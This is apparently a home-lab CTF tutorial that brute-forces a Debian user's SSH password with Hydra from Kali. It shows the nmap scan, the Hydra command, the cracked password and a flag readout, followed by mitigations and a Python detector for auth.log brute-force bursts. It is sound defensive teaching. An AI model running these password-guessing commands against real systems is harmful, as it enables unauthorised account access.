In this presentation we will crack the password of an ordinary Linux user via SSH in our personal lab. The machine from which we start the attack is a Kali Linux box, and the attacked machine is an ordinary Debian Linux on which a user set a weak password. Unfortunately the security settings on the target host are weak, so we have a great chance of success. We already know the name of the user.

Important note: cracking passwords in the wild is illegal! Do NOT do it out of the lab, unless you are a penetration tester with a signed contract!
The hacker’s machine: Kali Linux [192.168.23.131]
The attacked machine: Debian Bullseye [192.168.23.133]
The two machines can see each other on the network.
The attacked machine runs sshd with password authentication enabled.
We know the name of the user on the system: badpassjoe
We prepared a password file containing a list of the most common Linux root passwords that leaked some time ago.
We will use Hydra for running the attack. Hydra is a parallelized login cracker which supports numerous protocols to attack. It supports the following protocols at the time of writing this article: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Step 1: make sure that the SSH port is open
With a simple nmap scan we check that port 22 is open on the target system.
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.23.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 13:46 EST
Nmap scan report for 192.168.23.133
Host is up (0.00031s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
Step 2: run the attack
Knowing that SSH runs and listens on the default port, we can simply invoke the hydra command to do the heavy lifting for us.
┌──(kali㉿kali)-[~]
└─$ hydra -I -l badpassjoe -P top-ssh-mistakes.txt 192.168.23.133 ssh
It took less than 10 minutes to crack our naughty badpassjoe’s password to the Debian server!
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 13:35:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 131 login tries (l:1/p:131), ~9 tries per task
[DATA] attacking ssh://192.168.23.133:22/
[22][ssh] host: 192.168.23.133 login: badpassjoe password: admin123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 13:36:31
Here we are! The attack surface was huge in this case. The server did not enforce any strong password policy, and there was no firewall or authentication rate limiter to stop our repeated login attempts.
Step 3: enumerate the compromised system further
We can log in as badpassjoe with his password, admin123, and look around the server and his home directory!
┌──(kali㉿kali)-[~]
└─$ ssh badpassjoe@192.168.23.133
badpassjoe@192.168.23.133's password:
badpassjoe@debian:~$ ls
flag.txt
badpassjoe@debian:~$ cat flag.txt
TOM{OOPS_YOU_FOUND_ME}
This was the first CTF game I have ever created (in my home lab). 🙂
In the next part we will try to elevate our privileges to root!
Mitigation
- Use fail2ban or a firewall to restrict the number of unsuccessful authentication attempts.
- Set up an alert for a large number of authentication requests.
- Enforce a strong password policy.
- Use SSH keys instead of password authentication.
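As an added example (not from the original post), here is a small Python detector for the alerting mitigation above: it parses sshd lines in the format Debian writes to /var/log/auth.log, flags a source that piles up password failures against one account within a minute (the pattern Hydra's parallel tasks produce), and notes when a password login then succeeds. The log lines are constructed for the example, reusing the lab's addresses and user name; the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(  # the success/failure lines sshd writes to /var/log/auth.log
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$")

def parse_auth_log(lines, year=2023):
    """Turn matching auth.log lines into dicts; syslog timestamps carry no year."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append({"ts": ts, **{k: m[k] for k in ("result", "method", "user", "ip")}})
    return events

def find_bruteforce(events, threshold=10, window_s=60):
    """One alert per (source IP, user) reaching `threshold` password failures inside any
    `window_s` seconds; 'cracked' is True if a password login later succeeded."""
    by_pair = defaultdict(list)
    for ev in events:
        if ev["method"] == "password":  # key-based logins cannot be guessed this way
            by_pair[(ev["ip"], ev["user"])].append(ev)
    alerts = {}
    for key, evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e["ts"] for e in evs if e["result"] == "Failed"]
        start = 0  # sliding window over the sorted failure times
        for end, t in enumerate(fails):
            while (t - fails[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                cracked = any(e["result"] == "Accepted" and e["ts"] >= t for e in evs)
                alerts[key] = {"failures": len(fails), "cracked": cracked}
                break
    return alerts

def sample_auth_log():
    """Constructed sample, not captured from the lab: 12 parallel Hydra guesses against
    badpassjoe, then the successful login, then an unrelated key-based login by alice."""
    lines = [f"Jan 17 13:35:{32 + i // 4} debian sshd[{1201 + i}]: Failed password for "
             f"badpassjoe from 192.168.23.131 port {50100 + i} ssh2" for i in range(12)]
    lines.append("Jan 17 13:36:31 debian sshd[1230]: Accepted password for badpassjoe from 192.168.23.131 port 50180 ssh2")
    lines.append("Jan 17 13:40:05 debian sshd[1301]: Accepted publickey for alice from 192.168.23.50 port 41002 ssh2")
    return lines
```

On a real host, feed `open("/var/log/auth.log")` to `parse_auth_log` instead of the sample; the alert dictionary is what you would forward to your monitoring.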
Final thoughts
Hydra is a very versatile tool for penetration testers and blue teamers alike: we can look for the weak points of our own systems and systematically fix the issues.
Hydra can brute force different services like FTP and IMAP as well.
We can also provide a list of user names as well as a list of passwords, but the time required for testing grows with the size of the lists.
I have recorded a short YouTube video about the process:
If you have anything to share, please visit my Tom’s IT Cafe Discord Server!